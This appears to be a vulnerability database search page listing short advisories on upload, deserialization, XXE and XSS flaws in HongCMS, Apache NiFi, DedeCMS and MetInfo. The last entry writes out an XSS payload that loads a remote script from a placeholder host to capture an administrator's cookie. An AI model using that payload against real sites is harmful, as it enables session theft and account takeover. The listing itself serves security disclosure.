Lucene search
+L

68 matches found

osv
osv
added 2018/06/29 5:29 p.m.5 views

CVE-2018-13021

An issue was discovered in HongCMS 3.0.0. There is an Arbitrary Script File Upload issue that can result in PHP code execution via the admin/index.php/template/upload URI...

7.2CVSS6.1AI score0.02204EPSS
Exploits1References1
veracode
veracode
added 2018/01/26 4:42 a.m.27 views

Java Deserialization

nifi-framework-core is vulnerable to Java deserialization. An authenticated user who has a valid client certificate can upload a template containing malicious code to cause a denial of service DoS conditions and potentially perform other attacks...

5CVSS5.4AI score0.00862EPSS
Exploits0References1Affected Software1
osv
osv
added 2018/01/25 9:29 p.m.23 views

CVE-2017-15703

Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...

5CVSS5.6AI score0.00862EPSS
Exploits0References1
nvd
nvd
added 2018/01/25 9:29 p.m.37 views

CVE-2017-15703

Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...

5CVSS5.3AI score0.00862EPSS
Exploits0References1
cvelist
cvelist
added 2018/01/25 9:0 p.m.36 views

CVE-2017-15703

Any authenticated user valid client certificate but without ACL permissions could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users...

5.2AI score0.00862EPSS
Exploits0References1
cnvd
cnvd
added 2017/12/18 12:0 a.m.5 views

Desdev DedeCMS Arbitrary File Upload Vulnerability

Desdev DedeCMS Dream Weaving Content Management System is China's Zhuozhuo network Desdev Technology Co., Ltd. of a set of open-source set of content publishing, editing, management and retrieval is equal to one of the PHP Web site content management system CMS. A security vulnerability exists in...

8.8CVSS7.2AI score0.01498EPSS
Exploits0References1
cnvd
cnvd
added 2017/10/12 12:0 a.m.6 views

Apache NiFi XML External Entity Injection Vulnerability

Apache NiFi is a system for processing and distributing data. Apache NiFi versions 1.0.0 through 1.3.0 suffer from an XML external entity injection vulnerability in the implementation, which allows an attacker to upload templates containing malicious code and access sensitive files via an XXE...

6.5CVSS7.1AI score0.0194EPSS
Exploits3References1
myhack58
myhack58
added 2011/08/15 12:0 a.m.17 views

The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net

Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...

0.1AI score
Exploits0
Rows per page
Query Builder